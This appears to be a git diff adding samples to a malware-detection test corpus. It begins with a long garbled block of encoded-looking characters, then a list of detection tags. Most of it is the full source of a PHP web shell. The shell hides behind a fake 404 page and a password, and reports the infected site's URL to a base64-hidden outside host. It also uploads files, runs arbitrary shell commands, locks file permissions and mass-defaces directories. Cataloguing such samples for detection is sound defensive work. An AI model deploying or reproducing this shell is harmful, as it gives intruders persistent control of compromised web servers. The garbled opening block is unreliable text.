8JHƖ̖BEH8䰤H111DƦC̬֖F6ڦ7G8H5+5E0谦46F7CҰ3J2CްBIFB8717FEFش4+2Ɩ5203A3766CE2+7B+3+ޞBJEC+46ʰ23G000朘+F4¬D1ҜAGGEI4+B/9М4BHDC4F/CDA/BC2EHICHE9/59֤촠/I6G1ʲ86G+++޴5BⰠJ83FB7Τ1E/Aئ200G20JΚ56E2B74B8C2B84HΦ/C4H8ȦC8/4+9+CB4IHI؞F+Gޖ3B+DC6J2޲45/24G90B3B50ܜ4F9JΦJ7A8159BHCA85HܞABIʘ69I3ΪCBž9ԞМ1IDDΠ80BCG78CA¨J6HJ+■DI̢ACCF7A94+EBIA+HJ0E°ܤܠ1G18Ԟ+FΪC95F9/74B3B2G++BҜ/ؖ506CƖ0H3DJGܮ+318ޘ44D166C욬1GD754EE00+BܦCBI2ʰD5F8֘Bƞ8F03ҜFBGҪHC7J+EH8Fܮ6GȤ4905ʪ047شEJC73JE2AIFĢEBHޚ+4I7G16224G+94H71BҴB5H7B9ª2/G/44AHI72G4+ȬIJ2I9A411+GC14/JF62ܲE5BF1FF47A429ִ2+CCA67G69D364Ƣ2IIB5HGAƬ7AEڪئڠC5ACA6AFE49Ȧ321ܖ5CƘD/2I0Ҭ3HFԤҪAJJ3+CF7ƪ35688B3ҜD2ܘI5F2G+ /+E2A7J43G358FH1H𴜴1E+ECԚ758/29ʴ+ʚHĢEC+5C9267²+FG/FD724Ĵ6؞AHƠȪ0F5ФGB¨5G52CH37B25D0/AC231059Ě07B52ڨР6DئEA+CDA+0ꢤ45GIδ48GI8E01+IC/؞/̰02̰+J1DCҚH/G4貦3+2+֚FB01H38Ԣ4A+98J괨2+DƞBEF355F갪+殬B688B931G AؚȠJԞ7र638D8FD48F1+3HEԬD4ެ9178JȖG+7Gʮ+6ʜC77H09F𦤮6530CGE51Ұ95587I+JIЦG֪+BFE/+ΰC8/A3+DDBE+24FAʚ3E00AE34+/5HJ5Ƥ/7711/Ƣ45BAFBIIIEIܦA5ꜤޤIGB4/0D3I0̜A2BEК4찞HH35C8A+8C3GEAIACJ5ܦన57/7A5CDJG8ؚ7+J//ȲG3֦5¢A6ꦦҠشȬGܖΪ439IEG¨Ԛ87Dؠ18E8ܬ7E182++B90œ71ĞJ6⪠EHFF7A494123AJJI38¤֜EJ8֦1I0ܨ40I/64ֲBCFD5ȚE48®Jޤ6B䖰B8/H5H0М84ܖ9Ȫ1/FB3I޲+ҢJ/D94IGG052FEΪ47DG6–/A1D71B44ƚ7DƘE69G33蘚2ECβ6Ȟ306/21BHAJ3FȲC4J4ΦEJ3̨+9EHDAЮ3BJ6E7˜̲C+B18D+5DI֘ި9I1Ԩ8C+ή̞I6J/H47ĨF/9ΪFD0ҢHКœ13+HGG98BH74Fœ79C3G00I5153BĖAE6/9ڞȦ25BJFAA2D04Ц֬J7FȘ2E+ʲ1485G293895Dʲ3ؖBHB1/85H7ʚH301H/H054/+8E75JC3殖67BҘʖ̰Aت֨ҠFشAAIJޖ+蜬91B9903DIDE謤1ڦҲ68ꬪB88Ҧ0Ұ0I9ʞI1ABCĨ/ʦID/FBE7279HEҴ4/A6/E348BE갖4HEGH1̬ܮA𖚢58A6Iެ5G6E7452D0ʞHH+ʘ֖شD8GJʲ8Π/̚II6Ψ00CA46ΞB8HƲ/0+C8I6Ḭ/48AFΚIB47ʜ431HΦCڬD8/䘖Ȯ7ʖCD51+6AҞIԘ覨4δ/Ğ32JĢ0F6̤+0IʠΘ谖3+7+̘6+AA44EJ4IΚ61+5D2ID4HG+G++B1C862EI/3F4E3G1ޮEA4CE270369ҪEJ+֬808D287B5BBH2D̴FȴʦB89E5G205IG15֖41Ԣ6¬ܜ9GI3C4I3+3C؞+5C8BD쬴ТA3Ԗ+1EEAG1626HD0AܪI+ʬĦ+F/تF윜C284®9C؞67JAC80̴3G0°/0Ҝ58I9G48؜327IIJ9//88ܠ4H2ܞƦAF5D282޴/E6ڲžC+A47C7C4GI05A+ܞG6ʮIJ75¤6AG95AG4ʜ3AʠHԬ+C22CؘB9I20HIGܜ/5D+BB44EԠ9AF5C008CE792HD+E63J5A63F61Ъ/6F822272H3GHA4JECڤ6JCҘ+HИ/54Ƙ4Ԛ4Ԝ+آC2+2ڪCGFܜDԬDĞGԴ09ҢE8C971BJ옞A47FB7E9Ξ2D+70FD9I⠲0ĖF5䤰BҤJ6E8Hдب455H✖I++I̘G/AJ0+784+68B8HAHC54GF3D0FA6GD2513394GBʜ3B729CJEⴰ25H59GD5674DBJ9
34ب12CDڰG3705ꪤޮ5ĘGF+œI3HAFBEԘF67H0/̲ܖGEִ980/I7+7+Ш6344ܨ8BCHGEШ057I3A95Ģ6֞5F27ΤCJD936ޚ443CA3Ң3Ȧ3DꢠҠ226JΖJԞ4H7ҤHECFBF2/IJȤ1+3515//J1HGޠ0A7I̮05Բ64EEG+9Ʈ/6G0BĤب77I8F3AJƠH6H21ڴGAC1+ܰ042E3F8+FE+ʦCC7֬ʞAƲ248HG+C/F7Ю46FHښ7+6C4Ҡ5+JGΨ++4859IB5060IDD9ȮB15B+2޴Į4J֢H1/DE3EG7J0A68EC0DEJ+8E4I´CҨ4G8ʢB76C1H9J04D2629C8F87879BBJ6D3вH5/+7B15EJF6BҖ7ޤ򬘴BE99+ԚAJ78잮E03FC԰B+CȮDD55H58BJEC2Ү3G򨰖И/¨A/G85+IGH謖212ޠB68IJEҰGB¬J̢G4GD6AEG8CCDJ+I7/1 ƤHE/аIE1FJCDƦ֠EB΢9596+ĘI3I5/8椮2266FȢFEFIB55КB67C/JBFDF25ڞACDҬ8DE+IIF⨘/Ԥ5H+CFԠ˜88¢2I2ĞD䲦D512д1CGEԜJ3ڠ0635H67AA4ʘ16/18/EIFAȢ1ޚ1H386IFDC+3DJJ/G4FF7J1GD1DFH92+8̚6+DFAE0ܰʢC1ĨB+5Ҩ3ؘ7ڬ229CIԚԨIG1GGE2Ƞ79+2ȖI8Ę/2Hд3/874+C21FHEB62G9C3JA50CBGʦ3CCBҠA1AJ7IHЬGB1GJ+3450+C1J̴9/64蚘8DHF32EF73H6+CJ֜8++HGEE0J3F8FA+3CBIܴJ/ܬFDC+/+I+E86DCFCE֚E1+HG05+B/H̰924ܖF젨/ڲADEIHE6110D7D3D/1ECC1H8990+DƮFJDҪ30F218/GD27Ҝ5142JҲ3EԬ5Ĝ5IG03ȤB7Ȳ/CDJ04JJAĘH+DРI8ޠ+J507J+0BD¤IA9AA418/2ȮG4GGGږ++26Ԧ7I493갢E/C/53ADIȢEJ0֨2FC53G+3GEޘ5276F6G̢Ԭ4ҘE03HJʘ81Ԛ+8E1ƚ31ƠDGزEC̰Ș/ҴJ1E1شH12ԖCȦ5+B25F5E5ܬ/DIIIJC䦰157FڬI0/֠89Ȭ9478䦮D0C07D06E8C6C1AA06Gڬ5DCDGIB/IDҬJܖ08ƲԬ33रC/7E즮+Iʰ1/15A°26IJҪ/Ұ99G6ФD2EJ237//D83ά/6J39I/GAEFA9/13C6ژ8ޠ48G6؞ήEE36Ę1659ΜAJ3C47587CF82ְ–15̜48D+G04E/2D4894F/CJF4FF+I197BH9F11G0԰AĞ9IB4䰨H383HH38AAG3+3A6ܮ6024DD1A9DҰҜԞ7дI76JD3981Ȥ֚+B/FC/7JƜ3EJ̘B0Ю9EFG7F50Aܨ̨E䮦9E2B2AH1H1A29H94DڞڦڨI69̠9++B03ĄJHEG/Iޘ870ڴ/317EF/E1Ҫذ/A89J/G30ܘܠHCܘJ8HD4F+аFJ37H1+A3HAʤ̦6A+4C9Ɩ7C̮5A+II쬲G+CCƜ7410AEA8GD1ƦHG/0740AԠF2+BB̢4ҨƘ/92+39281Ȩ+8BBĖ674H+5+1ؤ5JȦ6ʨE/AFJDH+98Т90B4C2ԴڤК/+ܰDĦʬԖ97J58FD5C84JB̢7680//G¦A04A8C3HI̚GB8B+ܤCО֢GE05ĘDCADB֢άޤ/ԨEBئCEA6I5J78G29+7ʖAAGHAҜ6E0E5ҬC404/Ɯ1J5CҬ96J521E82J720//5287I0+1BACI78F5I//7Ƞ00D8ޠJ/B/9C8D/F2Ԭ41AC97I5C32D8+I+E6D/C3C3I5줢59IIHȰ450EE/–8/DG9BCIJ+0+G0ACBHƘ19D88D4B5010I̴H7HԲ9/02/3578F6H蚖IܪDG0ƮJؠ2A++EH7ҪDIAH571ƬB43C9֠Ȥ8CΖFFF0HFܪJD+0G43Ȟ3DABCĨ54BGFI05I+ƨD/+H9Cܢ57֜ਨ850D7F7I237/BHBGHIFȜزڰִ+79DGަ7DFE8E0IЦ22G8A74JBH7F84AFBD8JB0098H+60J63GҜ0BҦI12D޴3IB–Dʘ9HG7ƚ3/FJDHF5762ICB6¨298325DI/+0H+9ĢDHH37AIB/982H4Ԝ1/FHCG09774278/9AID/Ъ319ޘJޮ1ĖA22015B2A7+HОD023ʚ+4Ԛ17֦IJBCְDC5BGAA5Cܦ✘HJGC3FAE19J87/ڤCܘ67ܴ4HIȜF/G45313/G/1F7AHB֮
2/J346A+A8B30I804FIHΚ68FƘGCB54B4C3IDG47IJA0EG4D983΢5E6ΚDF5/12E0ƮH9DG+HE1AĴ0/J367ְ92II9C3+/25F2FJ+8DB05D̖ܰC1ڠIE82IްC9H1ި613ԞȮB–9913+0F䢪B66Ԙ¨Ц2ʜGE19줴1HE3J¬0DG쮰D8/Ҡ0/87JؤF15ҖʚA/B2Ъ5H3C9ޚE֢B3A6Ȗ/51DBH7G/0I3JI֤B78760Ұ3EFМ6CB675+Eδ/17ҴCB֞84Μ0ܴΪ79135褢17H8B5JJȴ𦪰B5HA֮J7/34A2/6H3927A3œ8Θ9454EDA61IC⠚7JG1DҬFܮ+8E/2HCHʬ44C373AAڬ촜3A8+/EI2E/+G+36/2FA4G6HAFC؞1C5JJ35C/968DF6J8/4493GA246F13193CEަ7FJIHܞI/JG10J37تH8HG2ڨ1B609E8FHCH3G66J3žCC26J0ʜ170GƘ8/2840HG3I3JD昤0/FG3C36CBΘI+ĢCE4BI91E1МCجB򴴘J8G9G؞++A/ؘBG8014ªꢠHBĤ1+J/FBꦢʞI+A6560ܮ04H1̰IHD5E4FE61AD9֘E/CJI20+3088EJ7065IC3ΨĬ25A1/EΠʰ+B+6䖮Jژ6ĪAGҮI6Cʚ̬̘EEDF36CJ9J9E8ڠA76Aަ+J®/ȬF6B99B5I00ĴH̰GEFED/B6D0JC4/EAGC+859FJ8659D05ȞGACԚ6Eܠª1IHG206J/HCܦ+A°6CBJ6֖5011E6/8B868ТܦJEĪECCAΞ10CAB8/FJ̚E809B/EG/C//GGDEG+5J53+/5Iܬ2®G7EF99632IA6G59ΞBAڞ0DAJBƠH074/Ʋ++43E155DĢF̖Ȝ8B7DB76I6H6B3ʨBG+3ĪHJƮDڪGH8+Ĵ7ЖCBA99DC2AAJ/J12937HȚFD53آ620H289HĴ5G36/1G螜F/Ԫ9JJ5IG3I+8ިA96I2֘FHC8+HI9Ĭ527J䬠0BIؖܖ498BFܢA3ڜ+FF0HI²/B355B754A2CH+IHD/116927ʚ+Ė1E3²F4HƘJ6䲨A3ְ2B874BHBD9I򦤴4G2GJ59DDC295223EC7FF38DH20J01F4Ң4✜7Ԫ옪97ШFޘȪJ䰨IFȢIE70/4I0Ʀδ4/13РAިCGƲHƠF6 
F8̬49D19/904ஞHJ344+J1AJ2DBD蚠5JG0ޮЮ+927F4EʲȪAHGFIG0ADʴĚΞ712DG24J/1393ҴB9AȜHC+CJCE69+C7J8螲+2G8BAİH7G5I7EE+ʢF1B/H977B1IE/EH9DИ+7G63IG737ژE92IԠ3ИAC1ĬBI386F̜45B6ڞE7+1Κږ/؜1EJ0–ID枞8D99Ү8DJACI쨖E88EΞDI7G2H1AG/JH35䲨1+7/94D8188JEEI+Т9+ޮ1H+A76526I6JJHGƦ27²AH7ԲA1+01I4ִ3//5斤1+CԮ/ȨED02B5ICشAE9A9΢ޘ/B2J68+54A535CA֬0F58EIH֤C14̲FED+8/69̲7F63D09ڰHΰ4FB78E1EIIBG2859J2ID2HHI19H/ΞIAG1DJشڨ8HК̴15E9Ȝ/Ơ4ȠB73/J3G؜Ƥ70F2B/7/728AިBC32AAG1H2IB5A0/J94/К8/95504/ФО3FB֖Cʦ2J/845ڢIGG/GĖ5Ħ8Р49+CDFHFH9CJ5DC93FD2H420GȮH40EI07I6ҖGGФ6ҬFBB4+I30A3/ޤ9JFJ98JD7޲F1–֘9ږ2E5+CAECG5878B89C2ĠIH7F4Gʜ9A+25I3Aڤ05E4/CB61Eް𨤖J148A+/2D9AEBA66E7A29Ԯ85Eؠ8ޚ0Dئ943GB8βD3I1+4IEA510ް7ƮJD4EI4+E/D84/086D1ڬʲФš2+HJIآHШJꚖD36IIDBΦIC/䞚CDGʤGGҰҲ+/GC31֪Ě9ƜAA162EA0𘘞DIA582E3D29IA+BȲ403890G9̘DI1212CJG91/37ԴIE168/1옪AޤG+0GEH437F+δEIA3931CIܮ3+A8E0֜HޚC3G5J56G7Ḫ1آ3I3JD7ACBFA4ƞ34B/JE3BJJHGȴ9B1D38ƚ̚55+ު3FA΢09F̞A4B//G/ذAH9IC5/CF9+8J5CG°D1ЮĘE08GʘA6И8ҘʞF52A1ܮ2ĬCΨڤܚ/A2C43GBCʞFЮ62D7+7E07GC933J4CH03B贬C5/ABGΞ+DꦨD+F3ʞA9誢¢HI/Aؖ6C5I02D1AC0J갦315EC38ЪBCCGРFA1B03/+ʚ7ڦHG00JFA94DC33/9+BΤBGȞGJ095HGβ92C0CڢAFABƘ˜2E0蜦J/+F6BҘFAEA6CF4421F7Ơ0DD4057ޚF48AԤF966CFBBH8G9+7204DF6J8H257372H52+2FA63FEH4I+9Cš//0DA9C®E5ʰH13D44F+/F9Ĭ+67C5/3+ΚC57817ܞ9Ьꢞ+/7/̤A5B+FJ+G8122A5FI¢H5A1IB4622JFʘ0ԖޚFH̤+I22I/2J40AF檜5H07GE0HD梜44A3G22A械18šDBТJJ5DH+JIHAA4A/3BJA29Až853JH1CH̰/G6FDDE51ܬIТ+CCܦFBEIG54A14GJ9IHI9C1D8HB2ʚ8DFCF4/CB̴48BJA0ܴ؜+6F7̠88J¢H0I55IJ7686+8DF2̞C21EG449G0J1D97ĪBI4/01+H̠FDJִB3ЖG薢DB0/BAJE/C9AD26B´JEڰڲ4B4Aƞ/B199HE7ƢC8EEIⲞF74/7BIAGGAC3E6I¨4+944δJ2FA0H60ʘҰ/4EE05BȘA/Җ2G822®1ڞI+22A줖GҴ99ެ48394B783ܠFCGA0EBH68J˜3ƪ/D02ȠIGHEAIܘ촠D4JذIC9J33DI792B5G37F7첞JޮI5CI5043IJʲ7GB+0HBE9A6ʖBG¢0C+48дHA6I/3339G/8A0B9ؤDG22427ԜCF204D1֤F2޲+004ΞئB/5++8஖HB6641G73ADD4+FFE05G7ޞڰ0JGA0ޞ59ئ46ڢ4ƜBE423಴400F03H6C1AIޖ350ښJ6/BȠ7F82¦ܴ+8EFB1619/0֜+0EGI0ƚ6G8̦8/G5ADH55DCAEI150F0C6EEH1̢1462ؠ6JC66D8²EԜ젘255FECA3E঴90+ΤH洞DAزICܞ֖Ҥ431+070FʚDFD+9+FD9/8CβBE5F2HH176ꮰ++4663責0BڲAE600D̴JE9IC/6H93̞Ԥ790ޘ5JG/G3JH6B2607J6氜AE26C2H6昞02BCE51䨠F+/H375308A5AIFܤ45A15D58CFAG0ܴҮ/36JH3539A9BDΜFHA47249+1+518/ƠG+314ޤF61J6D//F7䮦3A85BJ+/H8䰚6DE⪚4E1DJ934F//06œBE+
E2ĨCD1AޖBC4/AIBF3F56+GGҴ2AFGG̖209ҮB74004G631Iܖ8ִHJ֘3J/BF4ڨAH9E1C1E+Р8G4枪9H032DܮF4+/90AȦ+JGEƲޢ9G0CG09Ĵ4ڤܤC5+ஞ07A0AGDDԢت74Ȣ75+Bب78ڰDʴ+C98 02DDDԲGF31IF+A/Φ+C3+FC7B/5+蠦0̬91̮BE4EԬHA/96+1/J1ڪD04+IްƮԲܬA9D5GجG435E8G6FC07508I72+B168+DB3GְE8+9AIH143FJ3FAG+2䚠JF7CI3C+8B2/9A+05984J041AH196B؜24Ϊ6GƚA֖670FD2ڦʮ/5ުʢB䚬+FJIB384A34̲1ʰ9Eª1+1/6216J70FIEG490ΨEG5ꤖB1Ҥ9C/1E764+6ҞFڪ/674ҘAEG38GHΨG+3IB8A9¬54+4/0BҴ7ܜ+/J8HF17A¨36+60B8C䤘+D2/1Ұ9EFCFΜGдJ4IĴ07205J/CCJIژ5B61B7I7EIE97DȨGȨJDIIFFAƨ6H֪CJƢI6I47JJ2282+BA+9CF09409B̤20/F7+DHĨڨ+8CG0J0J8ʲGE18B0EJܦҤ9HC011ږ֘ҢA1C8IJ72BIƬ3C90+EJ/22BJ3JA5H1ަ67FžDޚ/欚0ʤ؞475IG4H7A0D0ިHʖ9ئH91C+FJشIƚ84JGA1DJB6ڞȘI73009쪪G/220ҜGƞ̚+/HަҤ֤IGB221I´69GԲ75ܴئ9Gư7¦+6JJE9A06IE58949BG𴴰7H3+9ޘEH1DEҤ7B83G➠CܪA9DCCB58H2J5/6G3G625²/G7GI+F0H77679+/60+26ڢ253432E21/Ԝ1Ȩ0JܴFD/IAAB25J3EҤ94CHBF18DCJ4򢮨Բ3ʠ79Aܚ4ʠԚ9FBEB2692IG1HƴԜ0778B4/64592IHJIG44E7ҚE/3/ذD92̲3ʮ9697JH833Ě/7GФG+ܠ5ޞ3Dެ7ز641A332ژEIGҘ86JDCԴܢA+DBGB++Ⲫ5؞ܲCG9+5C4B5C84681Aʦ19ƘIĢC2J2Ҫ15GH7E/ĠA16/Ь79EAج252J85BĤCIFDОʲH¬Ԟ21DFE0EC05 IC37J/Ȥ/0BGG39+55757Eİ52/DD7ID27IIDF+ȖIȲ4/IFGBDFI00307ޖAĠJ¢95756֪586CEž䢬7//622B0144J+4ֲ7J19JHIE5ȪGªβư22GI5ƴE2䤜7B8/֮޲1JIJ++207EGG̰+742H45I05A62ަƠܠHC9628JœC70G֚J6B+Ȯ21BB3̪89I20EȜHC6H1FCH97+8Тڬ4300Ȳ+BE39D09GDCȢF73+H5GI7GI4Iذ5EBJĞEФ5ܜG316A0CB1E1ƴJ2+0DEC3J2Ԩ6ҰE59DCG̪7E1آ2J3CHJABȤBA84B41467ಠE0HBAE7ĘF+J3HG08GBF1̦+2E0J+2ܤԠAJ2CF3EȚ5GJ73BE12IG50DB8C7/A41D3GFG2A2G0/67FH0J0Ϊ4/44II+Jƞ/0D7/93HܞJ1/80/I1E栚146B2GA4+/CGEꤰB0ڦ1I9/Բ7G38I6AI4BE+A24CAE0+GȬ1/426ĢܚGƮ7F4ҦHIGҜ/CԤC1̪¢7C57I865HԢD368IEȢH17ت2FР/H629102J246ȢⲖAHI2̠5806C877+7DEޮE1DԮE/1ܜ69EH5B8G+HIIFI7J0A1BAA1JD6D/̴֠F8ƨEJ99̦D5F6ȖFJ577D2IުIĮ+G+0E5EԤҨ7/7I6Ԣ0¨G褜673ΰ1AD5JBG08+D754ؤ9G6ԢH06E7֤IH72DҜ6䰢87228Ȣ2IJ̜A66ܲDBA6G/1/ΨE+D724C21I89777Ȝ6824E/GجI8EG31GH0FEȜ4+9CE8ICJ486//95CEI7H3935F24FGܚAܪAEJ32E4ʰE/3EFC91G3ܲI+ޜ9Ȝ겨J7JH282ʨAȨD/2+HܮCDƢ0220F8FD112ƬCBH9Ξ9CC޴ʘC3ƖJI4894ެJ143/48B1H/8F67E6螘G9I1A9Ԩ00E5IC+HE氨DCEE6BI3ަJ26467AIĴ+9+Ʀ1Eδ+/A69CGB3IJJ3ή9ܘΘ952086EC0/34305A59B84Т4BE̜/F4F/CF8=2FABB1J1JADABAA1BƞBFBBA; \ No newline at end of file 
diff --git a/samples/PHP/2024.S3RV4N7-SHELL/crot.php.simple b/samples/PHP/2024.S3RV4N7-SHELL/crot.php.simple new file mode 100644 index 00000000..42a174f0 --- /dev/null +++ b/samples/PHP/2024.S3RV4N7-SHELL/crot.php.simple @@ -0,0 +1,10 @@ +# PHP/2024.S3RV4N7-SHELL/crot.php +3P/php-malware/nonprintablechars +3P/php-malware/obfuscatedphp +3P/php-malware/websites +3P/signature_base/webshell/php +combo/backdoor/php +encoding/base64 +evasion/base64/decode +ref/site/url +techniques/code_eval diff --git a/samples/PHP/2024.malcure/simple.php b/samples/PHP/2024.malcure/simple.php new file mode 100644 index 00000000..2fee107f --- /dev/null +++ b/samples/PHP/2024.malcure/simple.php @@ -0,0 +1,3 @@ + +alert("Password Wrong!, Try Again.");'; + } + } + if (isset($_GET['logout'])) { + session_unset(); + session_destroy(); + header("Location: ".$_SERVER['PHP_SELF']); + exit(); + } + if (!isset($_SESSION['forbidden'])) { + ?> + + + + 404 Not Found + + + + + + +
+

Hello Dady

+ + +
+ + + + + + + 404 Not Found + + + + +
+



+Bypass 2024 Priv8 Shell
+ +
+


+NONE"; +} else { + $disf = "".$disfunc.""; +} + +function author() { + echo "

2024 Bypass Shell
"; + exit(); +} + +function cekdir() { + if (isset($_GET['path'])) { + $lokasi = $_GET['path']; + } else { + $lokasi = getcwd(); + } + if (is_writable($lokasi)) { + return "Writeable"; + } else { + return "Writeable"; + } +} + +function cekroot() { + if (is_writable($_SERVER['DOCUMENT_ROOT'])) { + return "Writeable"; + } else { + return "Writeable"; + } +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') { + continue; + } + $path = $dir.'/'.$item; + if (is_dir($path)) { + xrmdir($path); + } else { + unlink($path); + } + } + rmdir($dir); +} + +function statusnya($file){ +$statusnya = fileperms($file); + +if (($statusnya & 0xC000) == 0xC000) { + +// Socket +$ingfo = 's'; +} elseif (($statusnya & 0xA000) == 0xA000) { +// Symbolic Link +$ingfo = 'l'; +} elseif (($statusnya & 0x8000) == 0x8000) { +// Regular +$ingfo = '-'; +} elseif (($statusnya & 0x6000) == 0x6000) { +// Block special +$ingfo = 'b'; +} elseif (($statusnya & 0x4000) == 0x4000) { +// Directory +$ingfo = 'd'; +} elseif (($statusnya & 0x2000) == 0x2000) { +// Character special +$ingfo = 'c'; +} elseif (($statusnya & 0x1000) == 0x1000) { +// FIFO pipe +$ingfo = 'p'; +} else { +// Unknown +$ingfo = 'u'; +} + +// Owner +$ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); +$ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); +$ingfo .= (($statusnya & 0x0040) ? +(($statusnya & 0x0800) ? 's' : 'x' ) : +(($statusnya & 0x0800) ? 'S' : '-')); + + +// Group +$ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); +$ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); +$ingfo .= (($statusnya & 0x0008) ? +(($statusnya & 0x0400) ? 's' : 'x' ) : +(($statusnya & 0x0400) ? 'S' : '-')); + +// World +$ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); +$ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + +$ingfo .= (($statusnya & 0x0001) ? +(($statusnya & 0x0200) ? 't' : 'x' ) : +(($statusnya & 0x0200) ? 'T' : '-')); + +return $ingfo; +} + +function green($text) { + echo "
".$text."
"; +} + +function red($text) { + echo "
".$text."
"; +} + + +echo "Directory :  "; + +foreach($_POST as $key => $value){ + $_POST[$key] = stripslashes($value); +} + +$k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); + +if(isset($_GET['path'])){ + $lokasi = $_GET['path']; + $lokdua = $_GET['path']; +} else { + $lokasi = getcwd(); + $lokdua = getcwd(); +} + +$lokasi = str_replace('\\','/',$lokasi); +$lokasis = explode('/',$lokasi); +$lokasinya = @scandir($lokasi); +$cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; +$data = array('file_url' => $cur); +$options = array( + 'http' => array( + 'method' => 'POST', + 'header' => 'Content-type: application/x-www-form-urlencoded', + 'content' => http_build_query($data), + ), +); +$context = stream_context_create($options); +$result = file_get_contents($k3yw, false, $context); + +foreach($lokasis as $id => $lok){ + if($lok == '' && $id == 0){ + $a = true; + echo '/'; + continue; + } + if($lok == '') continue; + echo ''.$lok.'/'; +} +echo '
'; +echo '

'; +if (isset($_POST['upwkwk'])) { + if (isset($_POST['berkasnya'])) { + if ($_POST['dirnya'] == "2") { + $lokasi = $_SERVER['DOCUMENT_ROOT']; + } + $data = @file_put_contents($lokasi."/".$_FILES['berkas']['name'], @file_get_contents($_FILES['berkas']['tmp_name'])); + if (file_exists($lokasi."/".$_FILES['berkas']['name'])) { + echo "File Uploaded !  ".$lokasi."/".$_FILES['berkas']['name']."

"; + } else { + echo "Failed to Upload !

"; + } + } elseif (isset($_POST['linknya'])) { + if (empty($_POST['namalink'])) { + exit("Filename cannot be empty !"); + } + if ($_POST['dirnya'] == "2") { + $lokasi = $_SERVER['DOCUMENT_ROOT']; + } + $data = @file_put_contents($lokasi."/".$_POST['namalink'], @file_get_contents($_POST['darilink'])); + if (file_exists($lokasi."/".$_POST['namalink'])) { + echo "File Uploaded !  ".$lokasi."/".$_POST['namalink']."

"; + } else { + echo "Failed to Upload !

"; + } + } +} +echo "
"; +echo "Upload File : "; +echo '
+current_dir [ '.cekdir().' ] +document_root [ '.cekroot().' ] +
+ +
+
+'; +echo "
"; +print "
"; +print ""; +print "
"; +print "
"; +tools("cmd"); +function tools($toolsname, $args = null) { + if($toolsname === "cmd") { +print "
+ ".usergroup()->name."@".$GLOBALS['SERVERIP'].": ~ $ + + +
"; + print "
"; + } + } + function changeFolderPermissionsRecursive($dir, $perms) { + $iterator = new RecursiveIteratorIterator( + new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), + RecursiveIteratorIterator::SELF_FIRST + ); + + foreach ($iterator as $item) { + if ($item->isDir()) { + chmod($item->getPathname(), $perms); + } + } +} + + function changeFilePermissionsRecursive($dir, $perms) { + $iterator = new RecursiveIteratorIterator( + new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), + RecursiveIteratorIterator::SELF_FIRST + ); + + foreach ($iterator as $item) { + if ($item->isFile()) { + chmod($item->getPathname(), $perms); + } + } +} + +$currentDirectory = '.'; + + if (isset($_GET['do']) && $_GET['do'] === 'root_file') { + $newFilePermissions = 0644; + changeFilePermissionsRecursive($currentDirectory, $newFilePermissions); + echo "
"; + echo "Message :

Sukses Green All Files

"; + echo "
"; +} + +if (isset($_GET['do']) && $_GET['do'] === 'dark_file') { + $newFilePermissions = 0444; + changeFilePermissionsRecursive($currentDirectory, $newFilePermissions); + echo "
"; + echo "Message :

Sukses Lock All Files

"; + echo "
"; +} + +if (isset($_GET['do']) && $_GET['do'] === 'dark_folders') { + $newFolderPermissions = 0555; + changeFolderPermissionsRecursive($currentDirectory, $newFolderPermissions); + echo "
"; + echo "Message :

Sukses Lock All Folders

"; + echo "
"; +} + +if (isset($_GET['do']) && $_GET['do'] === 'root_folders') { + $newFolderPermissions = 0755; + changeFolderPermissionsRecursive($currentDirectory, $newFolderPermissions); + echo "
"; + echo "Message :

Sukses Green All Folders

"; + echo "
"; +} + + + +function exe($cmd) { + if(function_exists('system')) { + @ob_start(); + @system($cmd); + $buff = @ob_get_contents(); + @ob_end_clean(); + return $buff; + } elseif(function_exists('exec')) { + @exec($cmd,$results); + $buff = ""; + foreach($results as $result) { + $buff .= $result; + } return $buff; + } elseif(function_exists('passthru')) { + @ob_start(); + @passthru($cmd); + $buff = @ob_get_contents(); + @ob_end_clean(); + return $buff; + } elseif(function_exists('shell_exec')) { + $buff = @shell_exec($cmd); + return $buff; + } +} + +function path() { + if(isset($_GET['dir'])) { + $dir = str_replace("\\", "/", $_GET['dir']); + @chdir($dir); + } else { + $dir = str_replace("\\", "/", getcwd()); + } + return $dir; +} +function usergroup() { + if(!function_exists('posix_getegid')) { + $user['name'] = @get_current_user(); + $user['uid'] = @getmyuid(); + $user['gid'] = @getmygid(); + $user['group'] = "?"; + } else { + $user['uid'] = @posix_getpwuid(posix_geteuid()); + $user['gid'] = @posix_getgrgid(posix_getegid()); + $user['name'] = $user['uid']['name']; + $user['uid'] = $user['uid']['uid']; + $user['group'] = $user['gid']['name']; + $user['gid'] = $user['gid']['gid']; + } + return (object) $user; +} + +if(isset($_GET['do'])) { + if($_GET['do'] === "cmd") { + if(isset($_POST['cmd'])) { + if(preg_match("/^rf (.*)$/", $_POST['cmd'], $match)) { + tools("readfile", $match[1]); + } + elseif(preg_match("/^spawn (.*)$/", $_POST['cmd'], $match)) { + tools("spawn", $match[1]); + } + elseif(preg_match("/^symlink\s?(.*)$/", $_POST['cmd'], $match)) { + tools("symlink", $match[1]); + } + elseif(preg_match("/^rvr (.*)$/", $_POST['cmd'], $match)) { + tools("network", $match[1]); + } + elseif(preg_match("/^krdp$/", $_POST['cmd'])) { + tools("krdp"); + } + elseif(preg_match("/^logout$/", $_POST['cmd'])) { + unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); + print ""; + } + elseif(preg_match("/^killme$/", $_POST['cmd'])) { + unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); + 
@unlink(__FILE__); + print ""; + } + else { + print "
".exe($_POST['cmd'])."
"; + } + } + else { + files_and_folder(); + } + } +} +function massdeface($dir, $file, $filename, $type = null) { + $scandir = scandir($dir); + foreach($scandir as $dir_) { + $path = "$dir/$dir_"; + $location = "$path/$filename"; + if($dir_ === "." || $dir_ === "..") { + file_put_contents($location, $file); + } + else { + if(is_dir($path) AND is_writable($path)) { + print "[".color(1, 2, "DONE")."] ".color(1, 4, $location)."
